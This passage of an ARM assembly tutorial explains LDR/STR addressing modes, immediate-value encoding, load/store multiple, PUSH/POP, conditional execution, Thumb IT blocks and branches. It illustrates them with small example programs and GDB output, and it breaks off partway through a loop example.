    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the assembler calculated the location of our values in the Literal Pool (PC+12). You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-indexed. Load the value at memory address found in R1 to register R3 (not R1 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, compile it and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed is a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address and is then updated with the offset calculation R1+4. In other words, it loads the value at the address found in R1 (0x100A0, not R1+4) into R3, and then updates R1 to R1 (0x100A0) + offset (#4) = 0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into register R3, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is a register holding the offset, which is left/right shifted (<shifter>) to scale it. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be a loop iterating over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modifiy base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

    The second STR operation uses the pre-indexed address mode. This means that it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it first stores the value found in R2 at the memory address R1 (0x1009c) + the offset left-shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and then updates R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716

    Summary

    Remember the three offset modes in LDR/STR:

    1. offset mode uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset mode uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset mode uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s prefix address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s postfix address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]

    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) used to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason we sometimes need this syntax to move a 32-bit constant into a register in one instruction is that ARM can only load an 8-bit value in one go. What? To understand why, you need to know how immediate values are handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32 bits long, and all instructions are conditional. There are 16 condition codes which we can use, and one condition code takes up 4 bits of the instruction. Then we need 4 bits for the destination register, 4 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcode. The point here is that after assigning bits to the instruction type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that the ARM instruction is only able to use a limited range of immediate values with MOV directly.  If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8bit number (n) being able to load any 8-bit value in the range of 0-255, and a 4bit rotation field (r) being a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte

    This has the consequence that it is not possible to load a full 32-bit address in one go. We can bypass these restrictions by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511

    If you try to load an invalid immediate value, the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.

    Let's say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 into multiple parts or use LDR as described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256

    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 BYTES. This is important for understanding the offsetting. So the program consists of a .data section where we allocate an empty array (array_buff) with 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array with 7 elements, another for "bridging" the .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use the ADR instruction (the lazy approach) to get the address of the 4th element (words[3]) into R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of words[3], which in this case is 0x80B8. This means our array starts at the address of words[0]: 0x80AC (0x80B8 - 0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed by R0. So because we made R0 point to words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let's perform the STM instruction to store multiple values to memory. The STM instruction in our code takes the values (0x3 and 0x4) from registers R4 and R5 and stores them at a memory location specified by R1. We previously set R1 to point to the first array_buff element, so after this operation array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, LDM and STM operate in steps of a word (32 bits = 4 bytes).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory addresses 0x100D0 and 0x100D4. The following command inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before). These variations differ in the way they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get sequential (forward) data loading from the memory address specified by the first operand (the register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts, we move backwards and load words[3], words[2] and words[1] into R6, R5, R4. Yes, the registers are also filled backwards, so after the instruction finishes R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address After each load. The backward register loading happens because with every load we decrement the memory address, and the register number decreases with it, keeping the rule that higher memory addresses relate to higher register numbers. Check the LDMIA (or LDM) example: there we loaded the lower register first because the source address was lower, and then the higher register because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after:

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001

    PUSH AND POP

    There is a memory region within the process called the Stack. The Stack Pointer (SP) is a register which, under normal circumstances, always points to an address within the Stack’s memory region. Applications often use the Stack for temporary data storage. As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR/STR or their derivatives (LDM../STM..) are used for memory operations. In x86, we use PUSH and POP to store onto and load from the Stack. In ARM, we can use these two instructions too:

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored to the new address pointed by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instructions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp!, reglist (see the ARM Manual).

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are popped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    CONDITIONAL EXECUTION

    We already briefly touched on conditions while discussing the CPSR register. We use conditions to control the program’s flow at runtime, usually by making jumps (branches) or executing an instruction only when a condition is met. A condition is described by the state of specific bits in the CPSR register. Those bits change from time to time based on the outcome of certain instructions. For example, when we compare two numbers and they turn out to be equal, we trigger the Zero bit (Z = 1), because under the hood the following happens: a - b = 0. In this case we have an EQual condition. If the first number was bigger, we would have a Greater Than condition, and in the opposite case a Lower Than condition. There are more conditions, like Lower or Equal (LE), Greater or Equal (GE) and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.
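
    Code     Meaning                        Flags tested
    EQ       Equal                          Z == 1
    NE       Not equal                      Z == 0
    CS / HS  Carry set / unsigned >=        C == 1
    CC / LO  Carry clear / unsigned <       C == 0
    MI       Minus / negative               N == 1
    PL       Plus / positive or zero        N == 0
    VS       Overflow                       V == 1
    VC       No overflow                    V == 0
    HI       Unsigned higher                C == 1 and Z == 0
    LS       Unsigned lower or same         C == 0 or Z == 1
    GE       Signed greater than or equal   N == V
    LT       Signed less than               N != V
    GT       Signed greater than            Z == 0 and N == V
    LE       Signed less than or equal      Z == 1 or N != V
    AL       Always (default)               any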

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. The Negative bit gets set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above causes the Negative bit to be set (2 - 3 = -1), indicating that the value in r0 is Lower Than the number 3. Subsequently, the ADDLT instruction is executed because the LT condition is fulfilled when V != N (the values of the overflow and negative bits in the CPSR differ). Before we execute the second CMP, our r0 = 3. That’s why the second CMP clears the Negative bit (because 3 - 3 = 0, no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0, which causes the LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.
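
    If you assemble and run this snippet (the file name here is arbitrary), you can confirm the result via the exit code:

    azeria@labs:~$ as conditional.s -o conditional.o && gcc conditional.o -o conditional
    azeria@labs:~$ ./conditional; echo $?
    3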

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions. Specifically, Thumb-2 is the version which allows conditional execution. Some ARM processor versions support the “IT” instruction, which allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same as, or the logical inverse of, the first one. This means that if you use ITE, the first and second instructions (If-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrate this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; Branch instruction can only be used in the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the conditional codes and their opposite:
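
    EQ (equal)              <-> NE (not equal)
    HS / CS (unsigned >=)   <-> LO / CC (unsigned <)
    MI (negative)           <-> PL (positive or zero)
    VS (overflow)           <-> VC (no overflow)
    HI (unsigned >)         <-> LS (unsigned <=)
    GE (signed >=)          <-> LT (signed <)
    GT (signed >)           <-> LE (signed <=)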

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ add 1 to the value of PC and store the result in R3
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction adds 1 to the value in PC, stores the result in R3 and then branches to the address in R3. This causes a switch to Thumb state, because the LSB (least significant bit) is 1 and the address is therefore not 4-byte aligned. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10, which sets the Negative flag (0 - 10 = -10). Then we use an If-Then-Else block. This block skips the ADDEQ instruction because the Z (Zero) flag is not set, and executes the ADDNE instruction because the result was NE (not equal) to 10.

    Stepping through this code instruction by instruction in GDB will mess up the result, because you would execute both instructions in the ITE block. However, running the code in GDB without stepping through each instruction will yield the correct result, setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of code or jump to a specific function. The best examples of such use cases are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N==1) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
       int max = 0;
       int a = 2;
       int b = 3;
       if(a < b) {
        max = b;
       }
       else {
        max = a;
       }
       return max;
    }
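
    As a quick check (again, the file name is arbitrary), the assembly version indeed returns the bigger number as the exit code:

    azeria@labs:~$ as max.s -o max.o && gcc max.o -o max
    azeria@labs:~$ ./max; echo $?
    3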

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
       int a = 0;
       while(a < 4) {
       a= a+1;
       }
